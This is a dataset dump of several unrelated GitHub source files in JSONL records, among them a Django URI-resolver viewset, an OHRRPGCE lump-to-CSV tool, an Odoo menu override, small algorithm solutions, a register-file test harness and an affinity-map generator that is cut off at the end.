np.asarray([outputs[i][0] for i in range(len(outputs))])\nX = X[...,0]\nreg = LinearRegression().fit(X.T, val_y)\nprint(reg.score(X.T, val_y),reg.coef_)\nweights = reg.coef_\nprint(weights)\n\npred_val_y = np.mean([outputs[i][0] * weights[i] for i in range(len(outputs))], axis = 0)\nbest_thresh,best_score = find_best_thresh(val_y, pred_val_y)\npre_test_y = np.mean([outputs[i][1] * weights[i] for i in range(len(outputs))], axis = 0)\ntest_predict = ((pre_test_y)>best_thresh).astype(int)\n\nconfusion_mtx = confusion_matrix(val_y, ((pred_val_y)>best_thresh).astype(int))\nplot_confusion_matrix(confusion_mtx, classes = range(2),normalize=True)\nprint(confusion_mtx)\n\nsub = pd.read_csv('../input/sample_submission.csv')\nsub['prediction'] = test_predict\nsub.to_csv('submission.csv', index=False)\nprint(\"Overall time:\",elapsed(time.time()-stage1_time))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jianhongwu/Kaggle-Quora-Insincere-Questions-Classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26555805189","text":"from rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom apis_core.apis_metainfo.models import Uri\nfrom drf_spectacular.utils import extend_schema, OpenApiParameter, OpenApiTypes\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponseRedirect, QueryDict\nfrom django.urls import reverse\n\n\nclass UriToObjectViewSet(viewsets.ViewSet):\n \"\"\"\n This API route provides an endpoint for resolving URIs and forwarding\n them to the endpoint in the local instance. Pass a `uri` request\n parameter to resolve the uri.\n \"\"\"\n\n @extend_schema(\n parameters=[\n OpenApiParameter(\n \"uri\", OpenApiTypes.URI, OpenApiParameter.QUERY\n ), # path variable was overridden\n ],\n responses={301: None},\n description=\"This API route provides an endpoint for resolving URIs and forwarding them to the endpoint in the local instance. Pass a `uri` request parameter to resolve the uri.\",\n )\n def list(self, request):\n params = request.query_params.dict()\n uri = params.pop(\"uri\", None)\n if uri:\n u = get_object_or_404(Uri, uri=request.query_params.get(\"uri\"))\n model = u.root_object.self_contenttype.model\n r = reverse(f\"apis:apis_core:{model}-detail\", args=[u.root_object.id])\n if params:\n r += \"?\" + QueryDict.from_keys(params).urlencode()\n return HttpResponseRedirect(r)\n return Response()\n","repo_name":"acdh-oeaw/apis-core-rdf","sub_path":"apis_core/apis_metainfo/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"70400884987","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport itertools\nimport numpy as np\nfrom nohrio.ohrstring import *\nfrom nohrio.dtypes import dt\nfrom nohrio.rpg2 import RPGDir\n\ndef concatenate(lists):\n return sum(lists, [])\n\ndef escaped_split(string, sep):\n \"\"\"\n Split a line using a separator, but ignore separators between quotes\n \"\"\"\n escaped = False\n ret = []\n piece = \"\"\n for char in string:\n if char == ',' and not escaped:\n ret.append(piece)\n piece = \"\"\n elif char == '\"':\n escaped ^= True\n piece += char\n else:\n piece += char\n ret.append(piece)\n return ret\n\ndef escape_string(string):\n \"\"\"\n Escape an 8-bit string suitably for an csv file\n\n Nonprintable characters are escaped in the same format that Custom's textbox\n exporter uses: '\\ddd'\n \"\"\"\n ret = '\"'\n for c in string:\n if ord(c) <= 31 or ord(c) >= 127 or c == '\"':\n if ord(c) == 10:\n ret += '\\\\n'\n else:\n ret += '\\\\%03d' % ord(c)\n else:\n ret += c\n return ret + '\"'\n\ndef unescape_string(string):\n \"\"\"\n Unescape a string from a typical csv file\n \"\"\"\n temp = string.strip()\n if temp.startswith('\"') and temp.endswith('\"'):\n temp = temp[1:-1]\n \n ret = \"\"\n i = 0\n while i < len(temp):\n if temp[i:i+2] == '\\\\n':\n ret += '\\n'\n i += 2\n else:\n try:\n if temp[i] == '\\\\':\n ret += chr(int(temp[i+1:i+4]))\n i += 3\n else:\n ret += temp[i]\n except ValueError:\n ret += temp[i]\n i += 1\n return ret\n\ndef uniquify_strings(strings, template):\n seen = set()\n ret = []\n for namei, name in enumerate(strings):\n if name is None:\n ret.append(None)\n continue\n if len(name) == 0:\n ret.append(template % namei)\n continue\n name_ = name\n for i in itertools.count(1):\n if name_ not in seen:\n break\n name_ = name + str(i)\n seen.add(name_)\n ret.append(name_)\n return ret\n \n\ndef field_descriptor(dtype, name):\n \"\"\"\n Given a (possibly compound) numpy dtype, return a (header, decoder, encoder) tuple for manipulating a flattened representation.\n\n Each field is flattened to N primitives (eg integers, strings).\n A header is a list of N (sub)field names.\n A decoder takes a field of an ndarray of type 'dtype' and returns a list of N ints/floats/strings\n An encoder has signature encoder(dest, subfield, src)\n where * 'dest' is a data field (either 0 dimensional ndarray of type 'dtype', or a regular\n array if 'dtype' is an array)\n * 'subfield' is an index in range(0, N), usually ignored\n * 'src' is a string, a single cell from a csv file\n and converts and writes 'src' into 'dest'\n\n Note: The flattening is similar to flatten_dtype in ohrrpgce.py.\n \"\"\"\n ty = dtype #[name]\n if ty.isbuiltin:\n # Simple integer/float\n def decoder(src):\n return [src]\n def encoder(dest, subfield, src):\n # dereference\n dest[()] = src\n header = [name]\n\n elif ty.kind == 'S':\n # Raw string (as in textboxes)\n def decoder(src):\n return [escape_string(str(src))]\n def encoder(dest, subfield, src):\n dest[()] = unescape_string(src)\n header = [name]\n\n elif len(ty):\n # Compound field\n if ty.names[0] == 'length':\n # it's a string\n if ty.names[1] == 'value':\n # fvstr\n def decoder(src):\n return [escape_string(get_str8(src))]\n def encoder(dest, index, src):\n # TODO: warn if truncated\n set_str8(dest, unescape_string(src))\n else:\n # vstr2 or funky 4 byte length variant\n def decoder(src):\n return [escape_string(get_str16(src))]\n def encoder(dest, index, src):\n # TODO: warn if truncated\n set_str16(dest, unescape_string(src))\n header = [name]\n else:\n # Not primitive; recurse on subfields\n headers, decoders, encoders = list(zip(*\n [field_descriptor(ty[subfield], subfield) for subfield in ty.names]\n ))\n\n def decoder(src):\n ret = []\n for i, d in enumerate(decoders):\n ret.extend(d(src[i]))\n return ret\n def encoder(dest, index, src):\n for i, h in enumerate(headers):\n if index < len(h):\n field = ty.names[i]\n encoders[i](dest[field], index, src)\n break\n index -= len(h)\n\n header = [name + ' ' + header for header in concatenate(headers)]\n \n elif len(ty.shape):\n # Array\n if len(ty.shape) == 1:\n _header, _decoder, _encoder = field_descriptor(ty.base, '')\n else:\n subdtype = np.dtype((ty.base, ty.shape[1:]))\n _header, _decoder, _encoder = field_descriptor(subdtype, '')\n def decoder(src):\n return concatenate(_decoder(a) for a in src)\n def encoder(dest, index, src):\n field_len = len(_header)\n newindex = index / field_len\n if len(ty.shape) == 1:\n reference = dest[newindex:newindex+1].reshape(())\n else:\n reference = dest[newindex]\n _encoder(reference, index % field_len, src)\n header = concatenate([['%s %d%s' % (name, i, piece) for piece in _header] for i in range(ty.shape[0])])\n\n else:\n print(repr(ty))\n assert False\n\n return header, decoder, encoder\n\ndef bitset_array(bitname_list = None):\n \"\"\"\n field_descriptor override for arrays of bits (see field_descriptor)\n\n If bitnames is None, then the bitsets are exported as a comma delimited\n string of IDs of set bits, eg. '1,3,13'\n If bitnames is an array, each set bit is looked up in the array, and the\n results joined with commas.\n Bits with , or off the end of 'bitnames' are ignored: neither\n exported nor changed on import.\n \"\"\"\n def descriptor(dtype, name):\n assert dtype.base == np.uint8\n assert len(dtype.shape) == 1\n numbits = dtype.shape[0] * 8\n bitnames = bitname_list\n if bitnames is not None:\n assert len(bitnames) <= numbits\n numbits = len(bitnames)\n else:\n bitnames = [str(i) for i in range(numbits)]\n inverse_map = dict((name, i) for i, name in enumerate(bitnames))\n # keepmask marks the bits which should *not* be cleared if missing from the source string\n clearmask = np.zeros((), dtype = dtype)\n for i, bname in enumerate(bitnames):\n if bname:\n clearmask[i / 8] |= 1 << (i % 8)\n\n def decoder(src):\n bitvec = 0\n unsigned = src.view(np.uint8)\n for i, n in enumerate(src):\n bitvec += int(n) << (i * 8)\n ret = []\n for i in range(numbits):\n if bitnames[i] and bitvec & (1 << i):\n ret.append(bitnames[i])\n return [escape_string(','.join(ret))]\n\n def encoder(dest, subfield, src):\n dest &= ~clearmask\n bits = unescape_string(src).split(',')\n if bits == ['']:\n bits = []\n for bname in bits:\n try:\n bit = inverse_map[bname]\n except KeyError:\n raise ValueError(\"Bitname %s in bitsets field %s is not recognised\" % (bname, name))\n dest[bit / 8] |= 1 << (bit % 8)\n\n header = [name]\n return header, decoder, encoder\n return descriptor\n\ndef lump2csv(lump, fields, overrides):\n \"\"\"\n Returns a table in csv format containing a subset of the fields/columns and all the records/rows of a lump.\n\n 'lump' is an ndarray, and fields is a list of field names of the lump's dtype.\n \"\"\"\n fields = [name for name in fields if not name.startswith(\"unused\")]\n headers2, decoders = [], []\n for name in fields:\n if name in overrides:\n headers, decoder, encoder = overrides[name](lump.dtype[name], name)\n else:\n headers, decoder, encoder = field_descriptor(lump.dtype[name], name)\n headers2.extend(headers)\n decoders.append(decoder)\n ret = [','.join(headers2)]\n for item in lump:\n stuff = []\n for i, name in enumerate(fields):\n stuff.extend(decoders[i](item[name]))\n ret.append(','.join(str(a) for a in stuff))\n\n return '\\n'.join(ret)\n\ndef csv2lump(csv, lump, overrides):\n \"\"\"\n Parses a spreadsheet in csv format and writes into a ndarray of the right dtype.\n\n 'csv' is string containing multiple lines where the first line contains column\n headers, and the remaining lines are records starting at 0.\n 'lump' should have at least as many records as there in 'csv'\n \"\"\"\n lines = csv.split('\\n')\n present_headers = lines[0].split(',')\n records = [line for line in lines[1:] if len(line) > 0]\n\n if len(lump) != len(records):\n raise ValueError(\"csv table has %d records, but file has %d records\" % (len(records), len(lump)))\n\n headers, encoders = [], []\n for name in lump.dtype.names:\n if name in overrides:\n _headers, _decoder, _encoder = overrides[name](lump.dtype[name], name)\n else:\n _headers, _decoder, _encoder = field_descriptor(lump.dtype[name], name)\n headers.extend(_headers)\n encoders.extend( [(_encoder, name, i) for i in range(len(_headers))] )\n print()\n\n encoder_list = []\n\n for header in present_headers:\n if header == '':\n encoder_list.append(None)\n try:\n encoder_num = headers.index(header.lower())\n except ValueError:\n raise ValueError(\"Could not recognise the column named '\" + header + \"'\")\n encoder_list.append(encoders[encoder_num])\n\n print(\"Writing into records 0 to %d (out of %d existing)\" % (len(records) - 1, len(lump)))\n\n for recnum, csv_record in enumerate(records):\n # create a 0-dimensional reference to the record.\n # lump[recnum] returns an np.void object which is a *copy* of the original data\n record = lump[recnum:recnum+1].reshape(())\n\n fields = escaped_split(csv_record, ',')\n for i, datum in enumerate(fields):\n temp = encoder_list[i]\n if temp is None:\n continue\n encoder, fieldname, index = temp\n encoder(record[fieldname], index, datum)\n\n\nif __name__ == '__main__':\n\n def usage():\n print(\"Usage:\")\n print(\" \" + sys.argv[0] + \" --type --export \")\n print(\" \" + sys.argv[0] + \" --type --import \")\n print()\n print(\" Where is one of items, attacks, enemies, heroes, textboxes\")\n print()\n sys.exit(1)\n\n lumpnames = {'items': 'itm', 'enemies': 'dt1', 'heroes': 'dt0', 'attacks': 'attack.full', 'textboxes': 'say'}\n binsizes = {'items': 'item', 'enemies': 'enemy', 'heroes': 'hero', 'attacks': 'attack', 'textboxes': 'say'}\n\n if len(sys.argv) != 6:\n print(\"Not enough arguments\")\n usage()\n\n if sys.argv[1] != '--type' or sys.argv[2] not in lumpnames:\n print(\"Type not understood\")\n usage()\n lumpid = sys.argv[2]\n\n if sys.argv[3] == '--export':\n export = True\n mode = 'w'\n elif sys.argv[3] == '--import':\n export = False\n mode = 'r+'\n else:\n print(\"Specify --import or --export\")\n usage()\n\n if not os.path.isdir(sys.argv[4]):\n print(sys.argv[4] + \" is not a directory\")\n usage()\n\n rpg = RPGDir(sys.argv[4], 'r+')\n iofile = open(sys.argv[5], mode)\n\n def unsupported(msg, indicator, supported):\n msg += \" (%d; expected %d)\" % (indicator, supported)\n if indicator < supported:\n print(msg + \" The RPG file needs to be updated.\")\n else:\n print(msg + \" nohrio needs to be updated.\")\n sys.exit(1)\n \n rpgformat = rpg.data('gen').version\n if rpgformat not in (16, 17, 18, 19, 20, 21):\n unsupported(\"RPG file format not supported.\", rpgformat, 21)\n\n if rpgformat >= 19 and lumpid == 'heroes':\n if export:\n print(\"Warning: newer RPG format; reading old hero data. Missing some data fields, and re-importing hero data into this game is not supported.\")\n else:\n print(\"Importing heroes into newer RPG files is not supported; will not be until a total tabulate.py rewrite.\")\n sys.exit(1)\n\n if binsizes[lumpid]:\n lumpsize = dt[lumpnames[lumpid]].itemsize\n binsize = rpg.binsize[binsizes[lumpid]]\n if lumpid == 'attacks':\n binsize += 80\n if binsize != lumpsize: #ump.dtype.itemsize:\n unsupported(\"File format not supported: wrong binsize.\", binsize, lumpsize)\n\n lump = rpg.data(lumpnames[lumpid])\n\n # If you're interested in all fields\n fields = lump.dtype.names\n\n overrides = {}\n if lumpid == 'items':\n dt0 = rpg.data('dt0')\n hero_names = uniquify_strings([get_str16(n) for n in dt0['name']], 'hero %d')\n overrides = {'equippableby': bitset_array(hero_names)}\n fields = [n for n in fields if n != 'bitsets'] # No bitsets are used\n\n if lumpid == 'heroes':\n bitnames = [None] * 24 + ['rename on add', 'renameable', 'hide empty lists']\n overrides = {'bitsets': bitset_array(bitnames)}\n\n if lumpid == 'enemies':\n bitnames = uniquify_strings([None] * 54 + [''] * 11, '%d') # hide some, default names for the rest\n overrides = {'bitsets': bitset_array(bitnames)}\n\n if lumpid == 'attacks':\n bitnames = uniquify_strings([''] * 64, '%d') # default names\n bitnames2 = uniquify_strings([''] * 128, '%d')\n overrides = {'bitsets1': bitset_array(bitnames), 'bitsets2': bitset_array(bitnames2)}\n\n if lumpid == 'textboxes':\n bitnames = uniquify_strings([''] * 8, '%d') # default names\n overrides = {'choicebitsets': bitset_array(bitnames)}\n\n if 0 and lumpid == 'items':\n # Only interested in some fields...\n fields = (\n 'name',\n 'info',\n 'value',\n 'attack',\n 'weaponattack',\n 'equippable',\n # 'teach',\n # 'oobuse',\n 'weaponpic',\n 'weaponpal',\n 'bonuses',\n # 'equippableby',\n # 'bitsets',\n 'consumability',\n # 'own_tag',\n # 'in_inventory_tag',\n # 'equipped_tag',\n # 'equippedby_active_tag',\n # 'frame2handle',\n # 'frame1handle',\n # 'elemdmg'\n )\n\n if export:\n iofile.write(lump2csv(lump, fields, overrides))\n else:\n #print lump.md5()\n # Operate on a copy so that nothing is done if an exception occurs\n lump2 = np.copy(lump)\n csv2lump(iofile.read(), lump2, overrides)\n lump[:] = lump2[:]\n #print lump.md5()\n","repo_name":"ohrrpgce/nohrio","sub_path":"3rdparty/tabulate.py","file_name":"tabulate.py","file_ext":"py","file_size_in_byte":15549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"22391591041","text":"# -*- coding: utf-8 -*-\n# (C) 2018 Smile ()\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, models, tools\n\n\nclass IrUiMenu(models.Model):\n _inherit = 'ir.ui.menu'\n\n @api.model\n @tools.ormcache('frozenset(self.env.user.groups_id.ids)', 'debug')\n def _visible_menu_ids(self, debug=False):\n \"\"\" Hide hidden menus in navbar search provided by module\n web_responsive.\n Add a special case for module base_technical_features, forcing\n the display of technical menus hidden by default if user hasn't\n enable debug mode.\n \"\"\"\n if not debug:\n debug = self.env.user.has_group(\n 'base_technical_features.group_technical_features')\n visible_menu_ids = super(IrUiMenu, self)._visible_menu_ids(debug)\n groups = self.env.user.groups_id\n if not debug:\n groups = groups - self.env.ref('base.group_no_one')\n for menu in self.browse(visible_menu_ids):\n parent = menu.parent_id\n while parent:\n if parent.groups_id and not (parent.groups_id & groups):\n visible_menu_ids.remove(menu.id)\n break\n parent = parent.parent_id\n return visible_menu_ids\n","repo_name":"detian08/bsp_addons","sub_path":"smile/smile_web/models/ir_ui_menu.py","file_name":"ir_ui_menu.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"36415844238","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n temp = head\n count = 0\n \n while temp:\n temp = temp.next\n count += 1\n if count >= 10001:\n return True\n \n return False\n ","repo_name":"eyosiasbitsu/Competitive-programming-A2SV","sub_path":"After BootCamp/week6/141-linked-list-cycle/141-linked-list-cycle.py","file_name":"141-linked-list-cycle.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"5308848330","text":"import sys\n# 크레인 무게 제한 / 박스 무게\n# 6 8 9\n# 2 2 4 5 7\n\n# 3\n# 2 3 9\n# 5\n# 2 2 4 5 7\nn = int(input())\ncranes = list(map(int, input().split()))\nm = int(input())\nboxes = list(map(int, input().split()))\n\n\ndef solution1():\n cranes.sort(reverse=True)\n boxes.sort(reverse=True)\n\n turn = 0\n # 크레인 최대 감당 무게 < 박스 무게\n if cranes[0] < boxes[0]:\n print(-1)\n else:\n # 박스 다 처리할 때 까지 반복\n while boxes:\n # 크레인 한번씩 사용\n for crane in cranes:\n # 박스가 존재하는 경우\n if boxes:\n # 처음 박스 체크를 무거운거부터 크레인이 옮길수 있는 것 찾기\n idx = 0\n\n # index 오류 while 문에서 많이 발생해서 시간뺏김.\n while crane < boxes[idx]:\n if idx >= len(boxes)-1:\n break\n idx += 1\n # 박스 배에 옮기기\n if crane >= boxes[idx]:\n boxes.remove(boxes[idx])\n else:\n break\n\n # 시간\n turn += 1\n print(turn)\n\n\ndef solution2():\n if max(cranes) < max(boxes):\n print(-1)\n sys.exit()\n\n # 크레인이 현재 옮겨야하는 박스 번호\n crane_positions = [0]*n\n # 박스 옮겼는지 여부\n check_box_moved = [False]*m\n cranes.sort(reverse=True)\n boxes.sort(reverse=True)\n\n result = 0\n count = 0\n\n while True:\n if count == len(boxes): # 박스 다옮긴 경우\n break\n for i in range(n):\n while crane_positions[i] < len(boxes): # 현재 크레인이 모든 박스 위치 탐색\n # 아직 안 롬긴 박스중에서, 옮길 수 있는 박스 만날 때까지 반복\n if not check_box_moved[crane_positions[i]] and cranes[i] >= boxes[crane_positions[i]]:\n check_box_moved[crane_positions[i]] = True\n crane_positions[i] += 1\n count += 1\n break\n crane_positions[i] += 1 # 옮긴 후 다음 박스 위치 가리키기\n result += 1\n print(result)\n\n\nsolution2()\n","repo_name":"louisuss/Algorithms-Code-Upload","sub_path":"Python/FastCampus/greedy/1092++.py","file_name":"1092++.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5773987035","text":"import os\nimport random\n\nimport pytest\n\nfrom tests.instructions import *\nfrom tests.setup_tests import Config, init_waveforms, run_simulation\n\nconfig = Config(\n HDLFILES=[\"src/multi_cycle_cpu/datapath/registerfile.sv\"],\n TOPLEVEL=\"registerfile\",\n WORK_DIR=\"src/multi_cycle_cpu/datapath/\",\n TEST_DIR=\"tests/multi_cycle_cpu/datapath/registerfile\",\n)\n\ninit_waveforms(config)\n\nwaveform_file = config.TOPLEVEL + \"_d0_{}_d1_{}.vcd\"\n\n\ndef set_signals(we, a1, a2, a3, wd3):\n\n return {\n \"we\": str(we),\n \"a1\": str(a1),\n \"a2\": str(a2),\n \"a3\": str(a3),\n \"wd3\": str(wd3),\n }\n\n\n@pytest.mark.parametrize(\"we\", [0, 1])\n@pytest.mark.parametrize(\"a1\", [0, 1])\n@pytest.mark.parametrize(\"a2\", [0, 1])\n@pytest.mark.parametrize(\"a3\", [0, 1])\n@pytest.mark.parametrize(\"wd3\", [0, 1])\ndef test_registerfile(we, a1, a2, a3, wd3):\n run_simulation(\n config, \"test_registerfile\", waveform_file, set_signals(we, a1, a2, a3, wd3)\n )\n","repo_name":"ljhahne/multi_cycle_riscv_cpu","sub_path":"tests/multi_cycle_cpu/datapath/registerfile/test_registerfile.py","file_name":"test_registerfile.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8901542430","text":"from django.db.models import QuerySet\r\n\r\nfrom config.constants.api_const import HttpStatus, ErrorKeys, ErrorResponse\r\nfrom src.account.value_objects import UserId\r\nfrom src.amthauer.models import Component, Session, ParticipantAnswer, Participant, ScoreResult\r\nfrom src.amthauer.schemas import SessionSchemaIn, ParticipantAnswerSchemaIn, ParticipantSchemaIn\r\nfrom src.common.schemas.common_schemas import ResponseSchema\r\n\r\n\r\ndef create_session(session: SessionSchemaIn) -> tuple[\r\n int, QuerySet | Session] | \\\r\n tuple[int, ResponseSchema]:\r\n\r\n try:\r\n new_session: QuerySet | Session = Session(\r\n participant_id=session.participant,\r\n test_date=session.test_date,\r\n test_location=session.test_location,\r\n start_time=session.start_time,\r\n end_time=session.end_time,\r\n )\r\n new_session.save()\r\n print('------------------------------')\r\n print(new_session)\r\n print('------------------------------')\r\n return HttpStatus.OK.value, new_session\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef update_session_by_id(session_id: int, session_schema: SessionSchemaIn) -> tuple[\r\n int, QuerySet | Session] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n existed_session: QuerySet | Session = Session.objects.get(id=session_id)\r\n for attr, value in session_schema.dict(exclude_unset=True).items():\r\n setattr(existed_session, attr, value)\r\n existed_session.save()\r\n return HttpStatus.OK.value, existed_session\r\n except Session.DoesNotExist as e:\r\n print(e)\r\n return HttpStatus.NOT_FOUND.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.NOT_EXISTING_DB_ENTRY_ERROR.value}\r\n )\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.SHOW_ONE_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef create_participant_answer(participant_answer_schema: ParticipantAnswerSchemaIn) -> tuple[\r\n int, QuerySet | ParticipantAnswer] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n new_participant_answer: QuerySet | ParticipantAnswer = ParticipantAnswer(\r\n session_id=participant_answer_schema.session,\r\n component_id=participant_answer_schema.component,\r\n question_id=participant_answer_schema.question,\r\n answer_id=participant_answer_schema.answer,\r\n time_taken_answer_seconds=participant_answer_schema.time_taken_answer_seconds,\r\n )\r\n new_participant_answer.save()\r\n print('------------------------------')\r\n print(new_participant_answer)\r\n print('------------------------------')\r\n return HttpStatus.OK.value, new_participant_answer\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef create_participant(user_id: UserId, participant_schema: ParticipantSchemaIn) -> tuple[\r\n int, QuerySet | Participant] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n new_participant: QuerySet | Participant = Participant(\r\n user_id=user_id,\r\n first_name=participant_schema.first_name,\r\n last_name=participant_schema.last_name,\r\n gender=participant_schema.gender,\r\n date_of_birth=participant_schema.date_of_birth,\r\n email=participant_schema.email,\r\n phone_number=participant_schema.phone_number\r\n )\r\n new_participant.save()\r\n print('------------------------------')\r\n print(new_participant)\r\n print('------------------------------')\r\n return HttpStatus.OK.value, new_participant\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef create_score_result(score_result_schema: ParticipantSchemaIn) -> tuple[\r\n int, QuerySet | ScoreResult] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n new_score_result: QuerySet | ScoreResult = ScoreResult(\r\n session_id=score_result_schema.session,\r\n raw_score=score_result_schema.raw_score,\r\n standardized_score=score_result_schema.standardized_score,\r\n percentile_rank=score_result_schema.percentile_rank,\r\n time_taken_seconds=score_result_schema.time_taken_seconds,\r\n )\r\n new_score_result.save()\r\n print('------------------------------')\r\n print(new_score_result)\r\n print('------------------------------')\r\n return HttpStatus.OK.value, new_score_result\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef update_participant_by_id(participant_id: int, participant_schema: ParticipantSchemaIn) -> tuple[\r\n int, QuerySet | Participant] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n existed_participant: QuerySet | Participant = Participant.objects.get(id=participant_id)\r\n for attr, value in participant_schema.dict(exclude_unset=True).items():\r\n setattr(existed_participant, attr, value)\r\n existed_participant.save()\r\n return HttpStatus.OK.value, existed_participant\r\n except Session.DoesNotExist as e:\r\n print(e)\r\n return HttpStatus.NOT_FOUND.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.NOT_EXISTING_DB_ENTRY_ERROR.value}\r\n )\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.SHOW_ONE_DB_ENTRY_ERROR.value}\r\n )\r\n","repo_name":"ivanshevchenko1994/amthauer-test","sub_path":"src/amthauer/services/db_service.py","file_name":"db_service.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33613827304","text":"import numpy as np\r\n\r\n\r\ndef gen_affs(map1, map2=None, dir=0, shift=1, padding=True, background=False):\r\n if dir == 0 and map2 is None:\r\n raise AttributeError('map2 is none')\r\n map1 = map1.astype(np.float32)\r\n h, w = map1.shape\r\n if dir == 0:\r\n map2 = map2.astype(np.float32)\r\n elif dir == 1:\r\n map2 = np.zeros_like(map1, dtype=np.float32)\r\n map2[shift:, :] = map1[:h-shift, :]\r\n elif dir == 2:\r\n map2 = np.zeros_like(map1, dtype=np.float32)\r\n map2[:, shift:] = map1[:, :w-shift]\r\n else:\r\n raise AttributeError('dir must be 0, 1 or 2')\r\n dif = map2 - map1\r\n out = dif.copy()\r\n out[dif == 0] = 1\r\n out[dif != 0] = 0\r\n if background:\r\n out[map1 == 0] = 0\r\n out[map2 == 0] = 0\r\n if padding:\r\n if dir == 1:\r\n # out[:shift, :] = (map1[:shift, :] > 0).astype(np.float32)\r\n out[:shift, :] = out[2*shift:shift:-1, :]\r\n if dir == 2:\r\n # out[:, :shift] = (map1[:, :shift] > 0).astype(np.float32)\r\n out[:, :shift] = out[:, 2*shift:shift:-1]\r\n else:\r\n if dir == 1:\r\n out[:shift, :] = 0\r\n if dir == 2:\r\n out[:, :shift] = 0\r\n return out\r\n\r\ndef gen_affs_mutex(map1, map2, shift=0, padding=True, background=False):\r\n assert len(shift) == 3, 'the len(shift) must be 3'\r\n h, w = map1.shape\r\n map1 = map1.astype(np.float32)\r\n map2 = map2.astype(np.float32)\r\n\r\n if shift[1] <= 0 and shift[2] <= 0:\r\n map1[-shift[1]:, -shift[2]:] = map1[:h+shift[1], :w+shift[2]]\r\n elif shift[1] <= 0 and shift[2] > 0:\r\n map1[-shift[1]:, :w-shift[2]] = map1[:h+shift[1], shift[2]:]\r\n elif shift[1] > 0 and shift[2] <= 0:\r\n map1[:h-shift[1], -shift[2]:] = map1[shift[1]:, :w+shift[2]]\r\n elif shift[1] > 0 and shift[2] > 0:\r\n map1[:h-shift[1], :w-shift[2]] = map1[shift[1]:, shift[2]:]\r\n else:\r\n pass\r\n\r\n dif = map1 - map2\r\n out = dif.copy()\r\n out[dif == 0] = 1\r\n out[dif != 0] = 0\r\n if background:\r\n out[map1 == 0] = 0\r\n out[map2 == 0] = 0\r\n if padding:\r\n if shift[1] < 0:\r\n out[:-shift[1], :] = out[-2*shift[1]:-shift[1]:-1, :]\r\n elif shift[1] > 0:\r\n out[h-shift[1]:, :] = out[h-shift[1]-2:h-2*shift[1]-2:-1, :]\r\n else:\r\n pass\r\n if shift[2] < 0:\r\n out[:, :-shift[2]] = out[:, -2*shift[2]:-shift[2]:-1]\r\n elif shift[2] > 0:\r\n out[:, w-shift[2]:] = out[:, w-shift[2]-2:w-2*shift[2]-2:-1]\r\n else:\r\n pass\r\n else:\r\n if shift[1] < 0:\r\n out[:-shift[1], :] = 0\r\n elif shift[1] > 0:\r\n out[h-shift[1]:, :] = 0\r\n else:\r\n pass\r\n if shift[2] < 0:\r\n out[:, :-shift[2]] = 0\r\n elif shift[2] > 0:\r\n out[:, w-shift[2]:] = 0\r\n else:\r\n pass\r\n return out\r\n\r\ndef gen_affs_3d(labels, shift=1, padding=True, background=False):\r\n assert len(labels.shape) == 3, '3D input'\r\n out = []\r\n for i in range(labels.shape[0]):\r\n if i == 0:\r\n if padding:\r\n # affs0 = (labels[0] > 0).astype(np.float32)\r\n affs0 = gen_affs(labels[i], labels[i+1], dir=0, shift=shift, padding=padding, background=background)\r\n else:\r\n 